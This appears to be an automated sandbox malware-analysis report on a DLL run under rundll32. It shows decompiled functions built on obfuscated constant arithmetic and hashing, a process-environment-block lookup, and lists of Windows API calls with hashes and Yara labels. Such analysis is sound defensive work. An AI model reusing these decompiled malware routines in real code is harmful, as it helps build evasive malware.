                                                                                                                                                            • Instruction ID: 6395fbf6c7418d733f3512297fcaff0a84e463a60f94ea32d18e723981c387ec
                                                                                                                                                            • Opcode Fuzzy Hash: 40cc6cecb1fba03418c52cfe3ac00d0d2a6f5e6b8535ed7c2259ea5577511e05
                                                                                                                                                            • Instruction Fuzzy Hash: CC3176724083018BC315DF25D48540BFBE0FBD8788F118A1DF599A7221D375DA49CB97
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00378969 Relevance: .1, Instructions: 84COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                            			E00378969(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				void* _t84;
				signed int _t99;
				signed int _t103;
				void* _t109;
				signed int _t110;

				_push(_a8);
				_t109 = __edx;
				_push(_a4);
				_push(__edx);
				E003820B9(_t84);
				_v40 = _v40 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_v44 = 0x779abe;
				_v20 = 0xb5573d;
				_v20 = _v20 ^ 0xbb0d078e;
				_t103 = 0x58;
				_v20 = _v20 * 0x30;
				_v20 = _v20 ^ 0x328c396d;
				_v16 = 0x362481;
				_v16 = _v16 + 0x16cb;
				_v16 = _v16 | 0xfe676eb4;
				_v16 = _v16 ^ 0xfe76a30b;
				_v32 = 0xc91798;
				_v32 = _v32 * 0x65;
				_v32 = _v32 ^ 0x4f59c84a;
				_v28 = 0xb97254;
				_v28 = _v28 / _t103;
				_v28 = _v28 ^ 0x000673a7;
				_v12 = 0xb6c56;
				_v12 = _v12 * 0x2a;
				_v12 = _v12 << 1;
				_v12 = _v12 * 0x5b;
				_v12 = _v12 ^ 0x5515a6e4;
				_v8 = 0x1f2e02;
				_v8 = _v8 * 0x66;
				_v8 = _v8 * 0x79;
				_v8 = _v8 + 0xffff535b;
				_v8 = _v8 ^ 0xdf3e36a5;
				_v24 = 0x692813;
				_v24 = _v24 >> 0xb;
				_v24 = _v24 + 0xffffcb9d;
				_v24 = _v24 ^ 0xfffb0f76;
				E0038D25E(_t103);
				_v16 = 0x87422f;
				_v16 = _v16 | 0xfc58150b;
				_v16 = _v16 ^ 0xfcdf572b;
				_v20 = 0xc6266d;
				_v20 = _v20 << 0xa;
				_v20 = _v20 + 0xffff7638;
				_v20 = _v20 ^ 0x18992a28;
				_t99 = E00380AE0(_v20, _v16);
				_push(_v24);
				_t110 = _t99;
				_push(_t109);
				_push(_t110);
				_push(1);
				E003780E3(_v12, _v8);
				 *((short*)(_t109 + _t110 * 2)) = 0;
				return 0;
			}


















                                                                                                                                                            0x00378971
                                                                                                                                                            0x00378974
                                                                                                                                                            0x00378976
                                                                                                                                                            0x00378979
                                                                                                                                                            0x0037897b
                                                                                                                                                            0x00378980
                                                                                                                                                            0x00378986
                                                                                                                                                            0x0037898a
                                                                                                                                                            0x00378991
                                                                                                                                                            0x00378998
                                                                                                                                                            0x003789a5
                                                                                                                                                            0x003789a6
                                                                                                                                                            0x003789a9
                                                                                                                                                            0x003789b0
                                                                                                                                                            0x003789b7
                                                                                                                                                            0x003789be
                                                                                                                                                            0x003789c5
                                                                                                                                                            0x003789cc
                                                                                                                                                            0x003789d7
                                                                                                                                                            0x003789da
                                                                                                                                                            0x003789e1
                                                                                                                                                            0x003789ed
                                                                                                                                                            0x003789f0
                                                                                                                                                            0x003789f7
                                                                                                                                                            0x00378a02
                                                                                                                                                            0x00378a05
                                                                                                                                                            0x00378a0c
                                                                                                                                                            0x00378a0f
                                                                                                                                                            0x00378a16
                                                                                                                                                            0x00378a21
                                                                                                                                                            0x00378a28
                                                                                                                                                            0x00378a2b
                                                                                                                                                            0x00378a32
                                                                                                                                                            0x00378a39
                                                                                                                                                            0x00378a40
                                                                                                                                                            0x00378a44
                                                                                                                                                            0x00378a4b
                                                                                                                                                            0x00378a58
                                                                                                                                                            0x00378a5d
                                                                                                                                                            0x00378a64
                                                                                                                                                            0x00378a6b
                                                                                                                                                            0x00378a72
                                                                                                                                                            0x00378a79
                                                                                                                                                            0x00378a7d
                                                                                                                                                            0x00378a84
                                                                                                                                                            0x00378a97
                                                                                                                                                            0x00378a9c
                                                                                                                                                            0x00378aa2
                                                                                                                                                            0x00378aa7
                                                                                                                                                            0x00378aa8
                                                                                                                                                            0x00378aa9
                                                                                                                                                            0x00378aab
                                                                                                                                                            0x00378ab5
                                                                                                                                                            0x00378abe

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 731ac0dd4150b2fd44d590bae25ae052b41519021f0b5901ead843c46a23c023
                                                                                                                                                            • Instruction ID: 3e5406abcb25b316d11540da5aa8c5d2a0722cc22880f34f2699853e9a0e3ef7
                                                                                                                                                            • Opcode Fuzzy Hash: 731ac0dd4150b2fd44d590bae25ae052b41519021f0b5901ead843c46a23c023
                                                                                                                                                            • Instruction Fuzzy Hash: 9C41CF75C0121AEBCF18DFE5C98A9EEBFB0FB44314F108199D525AA260D3B95B45CF90
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 0038DBEA Relevance: .1, Instructions: 76COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                            			E0038DBEA(char* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t74;
				char* _t82;
				signed int _t84;

				_push(_a12);
				_t82 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E003820B9(_t74);
				_v20 = _v20 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v28 = 0x71ca23;
				_v24 = 0x57f692;
				_v12 = 0xd3252c;
				_v12 = _v12 + 0x4351;
				_v12 = _v12 + 0xffff5b79;
				_v12 = _v12 ^ 0x00d2c3f6;
				_v8 = 0xbb067e;
				_t84 = 0x11;
				_v8 = _v8 / _t84;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0xac5d3832;
				_v8 = _v8 ^ 0xac5d3334;
				_v8 = 0xab60c2;
				_v8 = _v8 << 0x10;
				_v8 = _v8 ^ 0x910d5570;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x0f1cf547;
				if( *__edx != 0) {
					do {
						_v8 = 0xbb067e;
						_v8 = _v8 / _t84;
						_v8 = _v8 >> 8;
						_v8 = _v8 ^ 0xac5d3832;
						_v8 = _v8 ^ 0xac5d3334;
						_v8 = 0xab60c2;
						_v8 = _v8 << 0x10;
						_v8 = _v8 ^ 0x910d5570;
						_v8 = _v8 >> 4;
						_v8 = _v8 ^ 0x0f1cf547;
						_v12 =  *_t82;
						_v12 = _v12 + (_v12 << _v8);
						_v12 = _v12 + (_v12 << _v8);
						_v12 = _v12 - _v12;
						_t82 = _t82 + 1;
						_t84 = 0x11;
					} while ( *_t82 != 0);
				}
				return _v12;
			}












                                                                                                                                                            0x0038dbf1
                                                                                                                                                            0x0038dbf4
                                                                                                                                                            0x0038dbf6
                                                                                                                                                            0x0038dbf9
                                                                                                                                                            0x0038dbfc
                                                                                                                                                            0x0038dbfe
                                                                                                                                                            0x0038dc03
                                                                                                                                                            0x0038dc0a
                                                                                                                                                            0x0038dc10
                                                                                                                                                            0x0038dc17
                                                                                                                                                            0x0038dc1e
                                                                                                                                                            0x0038dc25
                                                                                                                                                            0x0038dc2c
                                                                                                                                                            0x0038dc33
                                                                                                                                                            0x0038dc3a
                                                                                                                                                            0x0038dc46
                                                                                                                                                            0x0038dc49
                                                                                                                                                            0x0038dc4c
                                                                                                                                                            0x0038dc50
                                                                                                                                                            0x0038dc57
                                                                                                                                                            0x0038dc5e
                                                                                                                                                            0x0038dc65
                                                                                                                                                            0x0038dc69
                                                                                                                                                            0x0038dc70
                                                                                                                                                            0x0038dc74
                                                                                                                                                            0x0038dc7e
                                                                                                                                                            0x0038dc82
                                                                                                                                                            0x0038dc87
                                                                                                                                                            0x0038dc95
                                                                                                                                                            0x0038dc98
                                                                                                                                                            0x0038dc9c
                                                                                                                                                            0x0038dca3
                                                                                                                                                            0x0038dcb0
                                                                                                                                                            0x0038dcb7
                                                                                                                                                            0x0038dcbb
                                                                                                                                                            0x0038dcc2
                                                                                                                                                            0x0038dcc6
                                                                                                                                                            0x0038dcd8
                                                                                                                                                            0x0038dcdb
                                                                                                                                                            0x0038dce0
                                                                                                                                                            0x0038dce3
                                                                                                                                                            0x0038dce6
                                                                                                                                                            0x0038dce7
                                                                                                                                                            0x0038dce8
                                                                                                                                                            0x0038dcee
                                                                                                                                                            0x0038dcf6

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: e97a60f92e4476a9044cdee827ee64364931a3f318d6e648f2f6c43f9dd04637
                                                                                                                                                            • Instruction ID: f1d66d9f289ed313c332644dd66b62cab42611cfa8117df36c76826a4f1e4e6d
                                                                                                                                                            • Opcode Fuzzy Hash: e97a60f92e4476a9044cdee827ee64364931a3f318d6e648f2f6c43f9dd04637
                                                                                                                                                            • Instruction Fuzzy Hash: 6731F0B5D02358EBDF06DFA8CA4A2DEBBB1EF44315F2080D9D501A7265D7B14B98EB40
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00379011 Relevance: .1, Instructions: 67COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                            			E00379011(void* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _t75;
				intOrPtr _t80;
				signed int _t88;
				signed int _t89;

				_v40 = _v40 & 0x00000000;
				_v44 = 0xa2b624;
				_v8 = 0x99eb9;
				_t88 = __edx;
				_v8 = _v8 * 0x25;
				_v8 = _v8 | 0x30e9a4b5;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0x3d7f3aa0;
				_v24 = 0x77b72d;
				_v24 = _v24 << 1;
				_v24 = _v24 ^ 0x00e56894;
				_v20 = 0x2ce6cf;
				_v20 = _v20 >> 6;
				_v20 = _v20 ^ 0x000f2bb3;
				_v32 = 0xab4cd;
				_v32 = _v32 >> 0xc;
				_v32 = _v32 ^ 0x0007aa85;
				_v28 = 0x1f3eea;
				_v28 = _v28 >> 9;
				_v28 = _v28 ^ 0x0004326d;
				_v12 = 0xc1e4f9;
				_v12 = _v12 ^ 0x329f08e7;
				_v12 = _v12 + 0xcc91;
				_v12 = _v12 >> 8;
				_v12 = _v12 ^ 0x0038f912;
				_v16 = 0x3b10d4;
				_t89 = 0x6f;
				_v16 = _v16 / _t89;
				_v16 = _v16 + 0xffff4357;
				_v16 = _v16 ^ 0xf8ba2c27;
				_v16 = _v16 ^ 0x074e6031;
				_v36 = 0x1364c3;
				_v36 = _v36 + 0x503c;
				_v36 = _v36 ^ 0x001cba9a;
				_push(_v20);
				_push(_v24);
				_t75 = E00385BFD(_v32, _v28, _v12, E0038DCF7(_v8, __ecx, _v36));
				_t80 =  *0x393df8; // 0x0
				 *((intOrPtr*)(_t80 + 4 + _t88 * 4)) = _t75;
				return E0037A8B0(_v16, _t74, _v36);
			}

















                                                                                                                                                            0x00379017
                                                                                                                                                            0x0037901b
                                                                                                                                                            0x00379022
                                                                                                                                                            0x0037902f
                                                                                                                                                            0x00379035
                                                                                                                                                            0x00379038
                                                                                                                                                            0x0037903f
                                                                                                                                                            0x00379043
                                                                                                                                                            0x0037904a
                                                                                                                                                            0x00379051
                                                                                                                                                            0x00379054
                                                                                                                                                            0x0037905b
                                                                                                                                                            0x00379062
                                                                                                                                                            0x00379066
                                                                                                                                                            0x0037906d
                                                                                                                                                            0x00379074
                                                                                                                                                            0x00379078
                                                                                                                                                            0x0037907f
                                                                                                                                                            0x00379086
                                                                                                                                                            0x0037908a
                                                                                                                                                            0x00379091
                                                                                                                                                            0x00379098
                                                                                                                                                            0x0037909f
                                                                                                                                                            0x003790a6
                                                                                                                                                            0x003790aa
                                                                                                                                                            0x003790b1
                                                                                                                                                            0x003790bb
                                                                                                                                                            0x003790c0
                                                                                                                                                            0x003790c3
                                                                                                                                                            0x003790ca
                                                                                                                                                            0x003790d1
                                                                                                                                                            0x003790d8
                                                                                                                                                            0x003790df
                                                                                                                                                            0x003790e6
                                                                                                                                                            0x003790ed
                                                                                                                                                            0x003790f0
                                                                                                                                                            0x00379107
                                                                                                                                                            0x0037910c
                                                                                                                                                            0x00379117
                                                                                                                                                            0x0037912b

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 057a5cccaae675d54f9697fb23d5db618617de845d53a3d10e3c1fbf0c34f1cf
                                                                                                                                                            • Instruction ID: 2c206a3ea34462be2d5933768b81a8f38e48cd785fe91906a81d519691ed59b1
                                                                                                                                                            • Opcode Fuzzy Hash: 057a5cccaae675d54f9697fb23d5db618617de845d53a3d10e3c1fbf0c34f1cf
                                                                                                                                                            • Instruction Fuzzy Hash: B3310171D0021DEBCF09EFA5D94A4EEBBB1FF44318F208098C421B6250D7B90A58DF90
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00377FF2 Relevance: .1, Instructions: 54COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E00377FF2(void* __edx) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _t67;
				void* _t73;

				_v32 = _v32 & 0x00000000;
				_v40 = 0xdad9ef;
				_v36 = 0x9bb390;
				_v28 = 0x653306;
				_v28 = _v28 + 0xffff1628;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0x000c892d;
				_v12 = 0x5dd1e8;
				_v12 = _v12 ^ 0xb170c383;
				_v12 = _v12 | 0x2785cc64;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x05b45dea;
				_v8 = 0x56f6d9;
				_v8 = _v8 + 0xc121;
				_t73 = __edx;
				_t67 = 0x41;
				_v8 = _v8 / _t67;
				_v8 = _v8 << 7;
				_v8 = _v8 ^ 0x00a76089;
				_v24 = 0xf5edfd;
				_v24 = _v24 | 0x2f446a90;
				_v24 = _v24 ^ 0x7c479bdf;
				_v24 = _v24 ^ 0x53b1dfb9;
				_v20 = 0xafa903;
				_v20 = _v20 + 0xffff9fdf;
				_v20 = _v20 ^ 0xafba618c;
				_v20 = _v20 ^ 0xaf136809;
				_v16 = 0x74f1b4;
				_v16 = _v16 >> 7;
				_v16 = _v16 | 0x7bde77db;
				_v16 = _v16 ^ 0x7bddce28;
				return E00371E22(_v28, _v24, _t73, E00371DB9(_t67), _v20, _v16);
			}














                                                                                                                                                            0x00377ff8
                                                                                                                                                            0x00377ffc
                                                                                                                                                            0x00378003
                                                                                                                                                            0x0037800a
                                                                                                                                                            0x00378011
                                                                                                                                                            0x00378018
                                                                                                                                                            0x0037801c
                                                                                                                                                            0x00378023
                                                                                                                                                            0x0037802a
                                                                                                                                                            0x00378031
                                                                                                                                                            0x00378038
                                                                                                                                                            0x0037803c
                                                                                                                                                            0x00378043
                                                                                                                                                            0x0037804a
                                                                                                                                                            0x00378055
                                                                                                                                                            0x0037805b
                                                                                                                                                            0x0037805e
                                                                                                                                                            0x00378061
                                                                                                                                                            0x00378065
                                                                                                                                                            0x0037806c
                                                                                                                                                            0x00378073
                                                                                                                                                            0x0037807a
                                                                                                                                                            0x00378081
                                                                                                                                                            0x00378088
                                                                                                                                                            0x0037808f
                                                                                                                                                            0x00378096
                                                                                                                                                            0x0037809d
                                                                                                                                                            0x003780a4
                                                                                                                                                            0x003780ab
                                                                                                                                                            0x003780af
                                                                                                                                                            0x003780b6
                                                                                                                                                            0x003780e2

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 880c888cbb4deb6cb63736a4bd77bb98d1251cff4ad54d84bc8c76c5b330e3fb
                                                                                                                                                            • Instruction ID: dfe6b83e99878793be31394eb1876b19b88ba6c8ae26a3e65075396dd17c888f
                                                                                                                                                            • Opcode Fuzzy Hash: 880c888cbb4deb6cb63736a4bd77bb98d1251cff4ad54d84bc8c76c5b330e3fb
                                                                                                                                                            • Instruction Fuzzy Hash: 4E21EDB2C0131EEBCB58DFE5D94A4EEFBB0BB10314F208189D512B6264C3B40B898F91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00384087 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E00384087() {

				return  *[fs:0x30];
			}



                                                                                                                                                            0x0038408d

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                                            • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                                                            • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10014DA8 Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 229registrylibraryloaderCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 10014DC7
                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
                                                                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
                                                                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
                                                                                                                                                            • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
                                                                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
                                                                                                                                                            • ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
                                                                                                                                                            • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
                                                                                                                                                            • GetVersion.KERNEL32 ref: 10014EC3
                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 10014EE8
                                                                                                                                                            • RegQueryValueExA.ADVAPI32 ref: 10014F0D
                                                                                                                                                            • _sscanf.LIBCMT ref: 10014F2D
                                                                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 10014F62
                                                                                                                                                            • ConvertDefaultLocale.KERNEL32(72A4FFF6), ref: 10014F68
                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 10014F77
                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 10014F87
                                                                                                                                                            • EnumResourceLanguagesA.KERNEL32(00000000,00000010,00000001,10014522,?), ref: 10014FA2
                                                                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 10014FD3
                                                                                                                                                            • ConvertDefaultLocale.KERNEL32(72A4FFF6), ref: 10014FD9
                                                                                                                                                            • _memset.LIBCMT ref: 10014FF3
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
                                                                                                                                                            • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                                                                            • API String ID: 434808117-483790700
                                                                                                                                                            • Opcode ID: 65e42d20e5498d3f2b12d62d094999c60a842ca76fef1cc8bf600e845580613e
                                                                                                                                                            • Instruction ID: 7e9daad585b95ff1e899939a3d2ed629ef259dc49ac6fd8c909ded718bcfc143
                                                                                                                                                            • Opcode Fuzzy Hash: 65e42d20e5498d3f2b12d62d094999c60a842ca76fef1cc8bf600e845580613e
                                                                                                                                                            • Instruction Fuzzy Hash: A4818271D002699FDB10DFA5DD84AFEBBF9FB48341F11012AE944E7290DB789A41CB60
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1002E129 Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 44registryclipboardCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • RegisterClipboardFormatA.USER32(Native), ref: 1002E138
                                                                                                                                                            • RegisterClipboardFormatA.USER32(OwnerLink), ref: 1002E141
                                                                                                                                                            • RegisterClipboardFormatA.USER32(ObjectLink), ref: 1002E14B
                                                                                                                                                            • RegisterClipboardFormatA.USER32(Embedded Object), ref: 1002E155
                                                                                                                                                            • RegisterClipboardFormatA.USER32(Embed Source), ref: 1002E15F
                                                                                                                                                            • RegisterClipboardFormatA.USER32(Link Source), ref: 1002E169
                                                                                                                                                            • RegisterClipboardFormatA.USER32(Object Descriptor), ref: 1002E173
                                                                                                                                                            • RegisterClipboardFormatA.USER32(Link Source Descriptor), ref: 1002E17D
                                                                                                                                                            • RegisterClipboardFormatA.USER32(FileName), ref: 1002E187
                                                                                                                                                            • RegisterClipboardFormatA.USER32(FileNameW), ref: 1002E191
                                                                                                                                                            • RegisterClipboardFormatA.USER32(Rich Text Format), ref: 1002E19B
                                                                                                                                                            • RegisterClipboardFormatA.USER32(RichEdit Text and Objects), ref: 1002E1A5
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ClipboardFormatRegister
                                                                                                                                                            • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                                                                                                            • API String ID: 1228543026-2889995556
                                                                                                                                                            • Opcode ID: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
                                                                                                                                                            • Instruction ID: dd0e5b84f65b6698509d1545b20fc89df91f0ad9f4cec7ea2b0b947e93895074
                                                                                                                                                            • Opcode Fuzzy Hash: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
                                                                                                                                                            • Instruction Fuzzy Hash: 11013271800784AACB30EFB69C48C8BBAE4EEC5611322493EE295C7651E774D142CF88
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1003548E Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,10030AF9,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035494
                                                                                                                                                            • __mtterm.LIBCMT ref: 100354A0
                                                                                                                                                              • Part of subcall function 10035178: __decode_pointer.LIBCMT ref: 10035189
                                                                                                                                                              • Part of subcall function 10035178: TlsFree.KERNEL32(0000001E,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100351A3
                                                                                                                                                              • Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(00000000,00000000,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10035987
                                                                                                                                                              • Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(0000001E,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23), ref: 100359B1
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354B6
